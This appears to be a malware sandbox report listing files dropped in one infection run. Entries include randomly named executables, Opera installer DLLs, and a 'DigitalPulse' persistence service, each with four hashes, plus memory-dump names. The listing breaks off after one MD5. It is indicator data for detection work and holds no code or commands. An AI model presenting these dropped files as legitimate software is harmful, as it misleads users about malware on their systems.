SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

memory/3852-117-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\Pictures\98JN9KmVPfWhTtr0EFitFYHD.exe

MD5 6172d07e0711bc23642c3b6b86e4fec7
SHA1 c49a6bb96d15baa7d58ff9808c3311454959157b
SHA256 5bd34cee3edff3bedc453b25875218a4903a26c464159630514fb464c41ec4d6
SHA512 4374911d24f78fa501c7a015eb95c57f52192e47c5b9b9eeb6b972eb3e11c59e471d69aa97af619409fd5aa6e809c6c5310aa967b6aab69eeb40dc90131f076b

\Users\Admin\AppData\Local\Temp\Opera_installer_2310060634542493800.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

\Users\Admin\AppData\Local\Temp\is-BH603.tmp\_isetup\_iscrypt.dll

MD5 a69559718ab506675e907fe49deb71e9
SHA1 bc8f404ffdb1960b50c12ff9413c893b56f2e36f
SHA256 2f6294f9aa09f59a574b5dcd33be54e16b39377984f3d5658cda44950fa0f8fc
SHA512 e52e0aa7fe3f79e36330c455d944653d449ba05b2f9abee0914a0910c3452cfa679a40441f9ac696b3ccf9445cbb85095747e86153402fc362bb30ac08249a63

memory/3880-144-0x00000000001F0000-0x00000000001F1000-memory.dmp

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

MD5 6e134dc1d886bff3e47483ce995cc1e5
SHA1 de890da7e9b1ae167f78f3a96f20c087be6cabf6
SHA256 75ff324077b2cd0c8dc81be73b8542dcc472856d7cd0d3edaccbb011c7735b43
SHA512 f327eacb86e2c146dedc23fb7e8ae2c084971f4d25f7912b90798157acfcf8da14d0535c9a9c407f5e19a305a74f1543f747219f4e0d9c7ed5fc1ae652ac8f7f

memory/3800-155-0x00000000010A0000-0x00000000015ED000-memory.dmp

memory/4316-168-0x0000000005740000-0x0000000005902000-memory.dmp

memory/2164-175-0x00000000010A0000-0x00000000015ED000-memory.dmp

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

memory/4316-179-0x0000000005000000-0x0000000005066000-memory.dmp

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

MD5 6e134dc1d886bff3e47483ce995cc1e5
SHA1 de890da7e9b1ae167f78f3a96f20c087be6cabf6
SHA256 75ff324077b2cd0c8dc81be73b8542dcc472856d7cd0d3edaccbb011c7735b43
SHA512 f327eacb86e2c146dedc23fb7e8ae2c084971f4d25f7912b90798157acfcf8da14d0535c9a9c407f5e19a305a74f1543f747219f4e0d9c7ed5fc1ae652ac8f7f

C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\VFgTu512tXVIxQh4rRtDUZ98.exe

MD5 6e134dc1d886bff3e47483ce995cc1e5
SHA1 de890da7e9b1ae167f78f3a96f20c087be6cabf6
SHA256 75ff324077b2cd0c8dc81be73b8542dcc472856d7cd0d3edaccbb011c7735b43
SHA512 f327eacb86e2c146dedc23fb7e8ae2c084971f4d25f7912b90798157acfcf8da14d0535c9a9c407f5e19a305a74f1543f747219f4e0d9c7ed5fc1ae652ac8f7f

memory/4060-200-0x00000000738B0000-0x0000000073F9E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

memory/716-217-0x00007FF7076D0000-0x00007FF7077BC000-memory.dmp

memory/4316-220-0x0000000004DE0000-0x0000000004DF0000-memory.dmp

memory/4060-221-0x0000000005190000-0x00000000051A0000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310060634580452228.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/2228-226-0x00000000010A0000-0x00000000015ED000-memory.dmp

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

memory/512-232-0x0000000000400000-0x000000000064D000-memory.dmp

memory/4480-237-0x00000000001F0000-0x00000000001F9000-memory.dmp

memory/2412-240-0x0000000000AB0000-0x0000000000AB1000-memory.dmp

C:\Users\Admin\Pictures\INtIQ9k6fkUbYns1kXlJI1Uf.exe

MD5 3aabd684cee6bd8d66cb6b0cdd39f427
SHA1 efb2a6e24f860b36993362bab5978fe87c11d94b
SHA256 26bc8d3858f2512979aef222a18c60a22d4fa26541ed0226e31fafb36028441d
SHA512 32854d24b70ab5983bb3c54949162317beeb936df81fe0ad7927e89dd865dcbd51d6a6c5db293a148c916787826c9940c25f2aa6fddb395c73fe88d81019eef4

memory/2952-238-0x0000000000400000-0x0000000000409000-memory.dmp

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

MD5 6e134dc1d886bff3e47483ce995cc1e5
SHA1 de890da7e9b1ae167f78f3a96f20c087be6cabf6
SHA256 75ff324077b2cd0c8dc81be73b8542dcc472856d7cd0d3edaccbb011c7735b43
SHA512 f327eacb86e2c146dedc23fb7e8ae2c084971f4d25f7912b90798157acfcf8da14d0535c9a9c407f5e19a305a74f1543f747219f4e0d9c7ed5fc1ae652ac8f7f

memory/4480-234-0x0000000002360000-0x0000000002460000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310060634590612984.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

memory/1020-219-0x0000000000400000-0x000000000064D000-memory.dmp

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

MD5 6e134dc1d886bff3e47483ce995cc1e5
SHA1 de890da7e9b1ae167f78f3a96f20c087be6cabf6
SHA256 75ff324077b2cd0c8dc81be73b8542dcc472856d7cd0d3edaccbb011c7735b43
SHA512 f327eacb86e2c146dedc23fb7e8ae2c084971f4d25f7912b90798157acfcf8da14d0535c9a9c407f5e19a305a74f1543f747219f4e0d9c7ed5fc1ae652ac8f7f

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 1bfe591a4fe3d91b03cdf26eaacd8f89
SHA1 719c37c320f518ac168c86723724891950911cea
SHA256 9cf94355051bf0f4a45724ca20d1cc02f76371b963ab7d1e38bd8997737b13d8
SHA512 02f88da4b610678c31664609bcfa9d61db8d0b0617649981af948f670f41a6207b4ec19fecce7385a24e0c609cbbf3f2b79a8acaf09a03c2c432cc4dce75e9db

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157

MD5 59eca13e6616cd5ecd6068cec3fef192
SHA1 609ed36e7958a7adfe860ae7c403a8e7402ba66b
SHA256 f37e5fe7eb433cfaea766c0918c399dd68e9a0a11db6a3b63ccc15b42c6b6f18
SHA512 262ff53c18907fca96480afe7465379cbcaea3852df10f39c462b9d170a4e97f6b01fb761554360087dff48518857686999df8ae59cc6a134bc74562329a9239

C:\Program Files (x86)\OSNMount\OSNMount.exe

MD5 016e672371a4716f6f7b5f14a0d22006
SHA1 5a1a731ec902a26a4f0bb7774e1c25451b9a0f01
SHA256 1328eb253044694b17d4343f4eb000c95a7bfb0c478bc315eec842e7f7a2d8bc
SHA512 7dfceeb44a7d2a7e6c918bffd4c902241ecd4a8f70c81ad0d2fe31a91f05161c25229aafef40c153e13910b0ee4c9214126bd673472bac07ffb2e29668df5110

C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

C:\Users\Admin\Pictures\7Y6Mk73rBSOq4GYoZJ1pwpg0.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/4844-210-0x00000000001F0000-0x00000000001F1000-memory.dmp

memory/936-209-0x0000000000B70000-0x00000000010BD000-memory.dmp

memory/1020-206-0x0000000000400000-0x000000000064D000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_231006063456671936.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

\Users\Admin\AppData\Local\Temp\is-MCPJ5.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

C:\Users\Admin\AppData\Local\Temp\Opera_installer_231006063456671936.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Local\Temp\is-MCPJ5.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-25HDM.tmp\98JN9KmVPfWhTtr0EFitFYHD.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

memory/4316-173-0x0000000004F60000-0x0000000004FFC000-memory.dmp

C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 60fe01df86be2e5331b0cdbe86165686
SHA1 2a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256 c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512 ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 2d59894be33e943070751f0f9d8a5265
SHA1 28f878b9969173d6d699fdcf2651c96e4ac3498e
SHA256 c5e1298e731d89c2e575fbb82d6efb7737c268cc5e22b9cfbd03d0897eabd916
SHA512 bfc2a753def644e6ca5854706773ce84e1879ae20f68aa136a589adce86e0e61140ed839af79b1649a12539ddf04d11fbc0106b9cc7111f7d0e5576d4311c7fc

C:\Users\Admin\AppData\Local\Temp\is-TPBS9.tmp\_isetup\_setup64.tmp

MD5 e4211d6d009757c078a9fac7ff4f03d4
SHA1 019cd56ba687d39d12d4b13991c9a42ea6ba03da
SHA256 388a796580234efc95f3b1c70ad4cb44bfddc7ba0f9203bf4902b9929b136f95
SHA512 17257f15d843e88bb78adcfb48184b8ce22109cc2c99e709432728a392afae7b808ed32289ba397207172de990a354f15c2459b6797317da8ea18b040c85787e

C:\Users\Admin\AppData\Local\Temp\7zSEF32.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

C:\Users\Admin\AppData\Local\Temp\7zSEF32.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

C:\Users\Admin\AppData\Local\Temp\7zSEF32.tmp\Install.exe

MD5 dfc1d238d066adf23a2caa48b0154e2c
SHA1 8faefdab9d82683173b0be1cf03b5b2135e5e83e
SHA256 71c4417597a8c6b173bfaf3fb719a4c8d856b39fbe16869da971e7c9a0aee2f5
SHA512 451f5f34f02990329de96a048323acc53d48dfc6cf5b032f47ddf4612557c68db0b742be68eb71c3159b19c485d1000c5565bf93d245d79aa9f92ec7bc9a6b1d

C:\Users\Admin\AppData\Local\Temp\is-G0HM1.tmp\XZ4N3CmViIlQO9eomkdjBjg2.tmp

MD5 ebec033f87337532b23d9398f649eec9
SHA1 c4335168ec2f70621f11f614fe24ccd16d15c9fb
SHA256 82fdd2282cf61cfa6155c51a82c4db79487ffeb377d0245d513edeb44d731c16
SHA512 3875c2dd9bbeb5be00c2ccf8391bcb92d328a3294ce5c2d31fd09f20d80e12bd610d5473dfc2e13962578e4bb75336615cdf16251489a31ecbe4873d09cf1b11

memory/4916-283-0x0000000000400000-0x0000000002675000-memory.dmp

C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports\settings.dat

MD5 2d59894be33e943070751f0f9d8a5265
SHA1 28f878b9969173d6d699fdcf2651c96e4ac3498e
SHA256 c5e1298e731d89c2e575fbb82d6efb7737c268cc5e22b9cfbd03d0897eabd916
SHA512 bfc2a753def644e6ca5854706773ce84e1879ae20f68aa136a589adce86e0e61140ed839af79b1649a12539ddf04d11fbc0106b9cc7111f7d0e5576d4311c7fc

memory/2004-299-0x0000000000400000-0x0000000002675000-memory.dmp

memory/3880-304-0x0000000000400000-0x00000000004B2000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 f617b77439a87a21c17bd37b7e4acbbc
SHA1 eeb09f4737e555d71d6ec2cd9e8ddaca332be2cb
SHA256 890ea44758f914c6da036dad244e587211bc9dc4a8ae8a24a2940f27208f81a5
SHA512 4fc39c6b1bb65e0a0eb2bc7b9355dd95a6ae4fad3f01294b05ba3ab41ab1be877a99b60a721a8035b48a4fa0cd7e650a4b41618a55ec837a0ef45c21447fbdce

memory/3852-306-0x0000000000400000-0x000000000046A000-memory.dmp

memory/4456-307-0x00007FF672970000-0x00007FF672EB3000-memory.dmp

memory/2348-280-0x0000000000400000-0x0000000000413000-memory.dmp

memory/4844-313-0x0000000000400000-0x0000000000513000-memory.dmp

memory/4916-317-0x00000000042B0000-0x00000000046AC000-memory.dmp

memory/2004-316-0x0000000004740000-0x000000000502B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\7zSF201.tmp\Install.exe

MD5 4161dc37f51a8abe388ba9020848dd68
SHA1 c0df7765e93ba705aba079209e9a68a098a5e88a
SHA256 0fc7001b509e266c237dd3c1b00d93b0fdb5919bde5d6e180eaee00ac0cbb30b
SHA512 e82cc3163cf52390115477fd1c12277915dc92413a7677a74f9c469571b7e2af9cd8b9064c021b7ec0007de40e557fecc2d57e1858ffd09f9419e7bb64cb004c

memory/2004-315-0x0000000004230000-0x0000000004637000-memory.dmp

memory/2952-314-0x0000000000400000-0x0000000000409000-memory.dmp

memory/2412-324-0x0000000000400000-0x000000000071C000-memory.dmp

memory/2004-320-0x0000000000400000-0x0000000002675000-memory.dmp

memory/4684-327-0x0000000010000000-0x0000000010571000-memory.dmp

C:\Users\Admin\Pictures\UoE0rZ1e2TyOqz5gXFtrvWZo.exe

MD5 92730c87a11aecf1ad0e3c1553ee5523
SHA1 41cd8717113344fedf8504109df21253f210b0e4
SHA256 8e795f950cd97d1c5bcbdcc176857d84c3bd72061a1d24ac3f5c0e7ce0de740c
SHA512 9272a6ee98f4c0eb630448f11e96dda1ccbbd59e8ef1b40c65fcd7c5c7993f8fb72a90c08a1e7429be6f4b9e938e240a41495a7285cb68b748201a1008ed422c

C:\Users\Admin\Pictures\UoE0rZ1e2TyOqz5gXFtrvWZo.exe

MD5 92730c87a11aecf1ad0e3c1553ee5523
SHA1 41cd8717113344fedf8504109df21253f210b0e4
SHA256 8e795f950cd97d1c5bcbdcc176857d84c3bd72061a1d24ac3f5c0e7ce0de740c
SHA512 9272a6ee98f4c0eb630448f11e96dda1ccbbd59e8ef1b40c65fcd7c5c7993f8fb72a90c08a1e7429be6f4b9e938e240a41495a7285cb68b748201a1008ed422c

memory/3992-312-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Users\Admin\Pictures\54hLtST1w78WuT9Iw4O0oErf.exe

MD5 6476ef8de333d5810032a4ee90b0f97b
SHA1 08026561b27f18df03624b176b42cc5e90809ed7
SHA256 72913683e0175ae90c521829ab8d4c3272d330691cdafbb9533e314b2080d99c
SHA512 6aa5d40776e3ca3815833e3e2d3c21dc8ecfe3a2c1a68dab0a5371ec6d76a871752570459363440e95af81aebd1a093babbcadc6ca2f40d739571512ae7b2e13

memory/3992-167-0x0000000000400000-0x00000000004D8000-memory.dmp

\Users\Admin\AppData\Local\Temp\Opera_installer_2310060634553582164.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\Pictures\XZ4N3CmViIlQO9eomkdjBjg2.exe

MD5 fe469d9ce18f3bd33de41b8fd8701c4d
SHA1 99411eab81e0d7e8607e8fe0f715f635e541e52a
SHA256 b253f2cc3cafc35941d978a4d14b65610e641cb461e862fb0c155f3c30ce127a
SHA512 5b40c5259d01944e718bb14b8e6b994f2ea5bd391058aa8d086033cd609cb54231c7e07b4ab307ecfd5be28936e1c5576d3448504b99d9ac05c5442e5e1e85d9

memory/4316-152-0x0000000004E20000-0x0000000004EB2000-memory.dmp

memory/4316-147-0x0000000005240000-0x000000000573E000-memory.dmp

C:\Users\Admin\Pictures\VFgTu512tXVIxQh4rRtDUZ98.exe

MD5 6e134dc1d886bff3e47483ce995cc1e5
SHA1 de890da7e9b1ae167f78f3a96f20c087be6cabf6
SHA256 75ff324077b2cd0c8dc81be73b8542dcc472856d7cd0d3edaccbb011c7735b43
SHA512 f327eacb86e2c146dedc23fb7e8ae2c084971f4d25f7912b90798157acfcf8da14d0535c9a9c407f5e19a305a74f1543f747219f4e0d9c7ed5fc1ae652ac8f7f

memory/3852-137-0x0000000000400000-0x000000000046A000-memory.dmp

memory/4316-130-0x00000000002C0000-0x00000000005DC000-memory.dmp

memory/4316-125-0x00000000738B0000-0x0000000073F9E000-memory.dmp

C:\Users\Admin\Pictures\cyyky2Es1gtRl2hQuenXn5si.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

C:\Users\Admin\Pictures\njkrTFrTho9m8pktYQyvD45u.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

C:\Users\Admin\AppData\Local\Temp\is-MCPJ5.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

C:\Users\Admin\AppData\Local\Temp\is-KUQA3.tmp\is-P7KD3.tmp

MD5 f1b5055e1e80bf52a48683f85f9298ef
SHA1 26976cc0c690693084466d185c5e84da9870a778
SHA256 0b6381a1fc1ebc6594804042c8bf1ccfac7a9328bba3d3a487e571cbee298e50
SHA512 01290db6ac4dedb15d20fdc80a112b34cbce5c381c8fd262633c662e7927b314bca8063ad6109331d57feb50ed4045c05a7235347bb29edf401f9f867e9237ef

memory/4916-343-0x0000000000400000-0x0000000002675000-memory.dmp

memory/512-344-0x0000000000400000-0x000000000064D000-memory.dmp

memory/2984-345-0x00000000010A0000-0x00000000015ED000-memory.dmp

C:\Users\Admin\Pictures\SGn6P5CIYGdBbfvmRkm57P7D.exe

MD5 906e8dd59115761a98c0308313a2ad3b
SHA1 b2f9debeea9624b2e64e8062bf40382318cc42bd
SHA256 56d6788b4b40af4a7c0329a9d91b1b4407beef8bd9395ef852851f53a3d36dcf
SHA512 18cbbddc8e85acb236cd15c122adaa9537efc18216c394ba368ab0e391afe40b3dd6130dc1c60bb812da616f37897725c0ea6a695a93e9b25eb665f82bca870e

memory/2240-348-0x00007FFA54A50000-0x00007FFA5543C000-memory.dmp

memory/2952-352-0x0000000000400000-0x0000000000409000-memory.dmp

memory/3260-350-0x0000000000CF0000-0x0000000000D06000-memory.dmp

memory/2240-349-0x000001845A900000-0x000001845A984000-memory.dmp

memory/4316-347-0x0000000006240000-0x000000000676C000-memory.dmp

C:\Users\Admin\Pictures\e7eypyspmqtJqAFHcA4bI3CL.exe

MD5 cfc408dc44c357b7945e09f37f5a0f84
SHA1 0a63edb32f421127f5cb106667f967bf33a774ef
SHA256 051f2d78b7632727deed70bdbe9f41f5a8f94d8f7e596b70eaa6da72fa0412aa
SHA512 5ea4178af48fd0bf213ff06dd1406f153cacd98d28f772d47e617e82fcd2fd78d6559a507c39d51e8351c2e783a8375800f8feebaa622403f7d8fe8feb784b92

memory/3276-356-0x00007FFA621B0000-0x00007FFA621B2000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\DigitalPulse\DigitalPulse.lnk

MD5 e2088cb015348bcb97240bae2d0f9047
SHA1 4027d615c6986925e0044aa90cf33ac7e24bca97
SHA256 13bface6385207d9d50ab9a1de103aedd864cd0727f078342d23eb80080ea27b
SHA512 6b5f5aa1ca7176210ba8e8c558499d8c8384507f4b9cca8e283d5d1761e3f11d7d00e8041e5a5624276773e58facd3f1e8f08f85cc0fb65b4c0a7d2e11c7cc7e

memory/3276-363-0x00007FFA61280000-0x00007FFA61282000-memory.dmp

memory/3276-360-0x00007FFA61270000-0x00007FFA61272000-memory.dmp

memory/4684-359-0x0000000000370000-0x0000000000A45000-memory.dmp

memory/4316-358-0x0000000006C50000-0x0000000006C5A000-memory.dmp

memory/3276-354-0x00007FFA621A0000-0x00007FFA621A2000-memory.dmp

memory/3276-372-0x00007FFA5F820000-0x00007FFA5F822000-memory.dmp

memory/2240-371-0x000001845AD10000-0x000001845AD72000-memory.dmp

memory/3276-373-0x00007FFA5F830000-0x00007FFA5F832000-memory.dmp

memory/3276-374-0x00007FF606960000-0x00007FF6079DB000-memory.dmp

memory/2240-379-0x0000018474E50000-0x0000018474EAE000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

MD5 8592ba100a78835a6b94d5949e13dfc1
SHA1 63e901200ab9a57c7dd4c078d7f75dcd3b357020
SHA256 fdd7d9def6f9f0c0f2e60dbc8a2d1999071cd7d3095e9e087bb1cda7a614ac3c
SHA512 87f98e6cb61b2a2a7d65710c4d33881d89715eb7a06e00d492259f35c3902498baabffc5886be0ec5a14312ad4c262e3fc40cd3a5cb91701af0fb229726b88c3

memory/2004-385-0x0000000000400000-0x0000000002675000-memory.dmp

memory/4456-394-0x00007FF672970000-0x00007FF672EB3000-memory.dmp

memory/4844-397-0x0000000000400000-0x0000000000513000-memory.dmp

memory/2412-398-0x0000000000400000-0x000000000071C000-memory.dmp

memory/512-400-0x0000000000400000-0x000000000064D000-memory.dmp

memory/4916-403-0x0000000000400000-0x0000000002675000-memory.dmp

C:\Users\Admin\AppData\Roaming\DigitalPulse\DigitalPulseService.exe

MD5 3945df42a2cbe47502705ecde2ff2a87
SHA1 1545a5a72ffaf6c6c8e9df0ca6aa8d2aff5cc5b5
SHA256 c767ecc88396047716862b881480450b517715bfc7bdd12c878cf2d54262f1f8
SHA512 0850ac896ae1d8e766d34746294d212fe071c45e0f740085d37236e0caa05d823ad4ddfeba2baf1bcc71b20612058f08dbafd62fb3deb1a8ed1074d2eae71ead

memory/2004-404-0x0000000000400000-0x0000000002675000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 8ea5537563509e7147d4cad2718c3f54
SHA1 ebfcd746e3fe3632f22239758240368753f2db8b
SHA256 0e496d05f60b99b95ae7a5d79ca6e43e188a474468a9218e8c8098b7ce58398a
SHA512 53752b0212b35468150382c273cea78d0d03abec76a2f227d5c8bf0d8ad78b3acdfd9363d77c3b9c29ebae6dd55343a53fc25ed0e1c7078f97a38255af2a86c5

memory/3992-418-0x0000000000400000-0x00000000004D8000-memory.dmp

C:\Program Files\Microsoft Office 15\ULUCMFGWJN\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
